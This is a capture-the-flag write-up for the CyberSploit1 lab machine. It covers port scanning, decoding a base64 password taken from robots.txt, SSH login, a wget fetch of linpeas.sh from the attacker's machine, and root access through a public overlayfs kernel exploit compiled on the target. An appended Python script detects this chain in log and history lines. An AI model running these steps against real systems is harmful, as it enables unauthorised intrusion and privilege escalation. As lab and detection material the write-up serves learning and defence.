CyberSploit1
nmap
(base) [psdon@arch CyberSploit1]$ mkdir nmap
(base) [psdon@arch CyberSploit1]$ sudo rustscan -a 192.168.217.92 --ulimit 5000 -t 2000 -- -T4 -A -oA nmap/all-ports-service-scan
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 192.168.217.92:22
Open 192.168.217.92:80
A web server on port 80 is open
Let's check the source code of the page, where we can find a possible username.
Let's also check robots.txt.
As you can see, it contains a base64-encoded string.
We can decode it by executing the following command:
(base) [psdon@arch CyberSploit1]$ echo Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0= | base64 --decode
cybersploit{youtube.com/c/cybersploit}
Exploitation
Let's try to log in using the username itsskv and the decoded string as the password.
(base) [psdon@arch nikto]$ ssh itsskv@192.168.217.92
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.217.92' (ECDSA) to the list of known hosts.
itsskv@192.168.217.92's password: cybersploit{youtube.com/c/cybersploit}
itsskv@cybersploit-CTF:~$
Looks like we have successfully gained an initial shell. Sweet :D
Post Exploitation
First, let's transfer linpeas.sh from our machine to the target machine.
(base) [psdon@arch CyberSploit1]$ cd /opt/peass/linPEAS/
(base) [psdon@arch linPEAS]$ ls
builder images linpeas.sh README.md
(base) [psdon@arch linPEAS]$ sudo python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
You can find your own machine's VPN (tun0) IP address by executing the following.
(base) [psdon@arch CyberSploit1]$ ip a | grep tun
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
inet 192.168.49.217/24 scope global tun0
(base) [psdon@arch CyberSploit1]$
Then transfer the script to the target using wget:
itsskv@cybersploit-CTF:~$ wget http://192.168.49.217/linpeas.sh
--2021-08-27 02:16:13-- http://192.168.49.217/linpeas.sh
Connecting to 192.168.49.217:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 458110 (447K) [application/x-sh]
Saving to: `linpeas.sh'
100%[================================================================>] 4,58,110 147K/s in 3.0s
2021-08-27 02:16:17 (147 KB/s) - `linpeas.sh' saved [458110/458110]
itsskv@cybersploit-CTF:~$ chmod +x linpeas.sh
And now we can run linpeas.sh
itsskv@cybersploit-CTF:~$ ./linpeas.sh
linpeas-ng by carlospolop
Right off the bat, you can see the version of the Linux kernel it is running.
We can check this Linux kernel version with searchsploit,
and I found out it is vulnerable to the overlayfs exploit.
Privilege Escalation
Let's mirror the exploit to our current working directory and copy the content of the file to the clipboard:
xclip -selection clipboard -i < 37292.c
And paste it into a file on the target machine:
nano e.c
We can compile the C source code using the gcc binary installed on the target machine. Right after running the exploit, we got root on the target machine.
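As an added defender-side example (not part of the original writeup), here is a small Python script that scans constructed auth.log and shell-history lines for the chain used above: a password SSH login, a wget from a private address, a linpeas run and a local gcc compile. The rule weights and the sample log lines are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines (not from the writeup), modelled on the chain
# described above: SSH password login, wget of linpeas.sh, chmod, gcc.
SAMPLE_AUTH_LOG = """\
Aug 27 02:10:01 cybersploit-CTF sshd[1201]: Accepted password for itsskv from 192.168.49.217 port 51322 ssh2
Aug 27 02:10:01 cybersploit-CTF sshd[1201]: pam_unix(sshd:session): session opened for user itsskv by (uid=0)
"""

SAMPLE_HISTORY = """\
wget http://192.168.49.217/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
nano e.c
gcc e.c -o e
./e
"""

# Each rule: (name, compiled regex, weight). Weights are assumed values.
RULES = [
    ("ssh_password_login", re.compile(r"Accepted password for (\S+) from (\S+)"), 1),
    ("download_from_private_ip",
     re.compile(r"\b(?:wget|curl)\s+https?://(10\.|172\.(1[6-9]|2\d|3[01])\.|192\.168\.)"), 2),
    ("enum_script", re.compile(r"linpeas|linenum", re.I), 3),
    ("local_compile", re.compile(r"\bgcc\b.*\.c\b"), 2),
]

def scan_lines(lines):
    """Return {rule_name: [matching lines]} for an iterable of log/history lines."""
    hits = defaultdict(list)
    for line in lines:
        for name, rx, _ in RULES:
            if rx.search(line):
                hits[name].append(line.rstrip())
    return dict(hits)

def risk_score(hits):
    """Sum the weights of every rule that fired at least once."""
    weights = {name: weight for name, _, weight in RULES}
    return sum(weights[name] for name in hits)

def analyze(auth_log, history):
    """Scan both sources together and return (hits, total score)."""
    hits = scan_lines(auth_log.splitlines() + history.splitlines())
    return hits, risk_score(hits)

if __name__ == "__main__":
    hits, score = analyze(SAMPLE_AUTH_LOG, SAMPLE_HISTORY)
    for name, lines in hits.items():
        print(f"[{name}]")
        for entry in lines:
            print("   ", entry)
    print("risk score:", score)
```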
Thanks, and enjoy! :D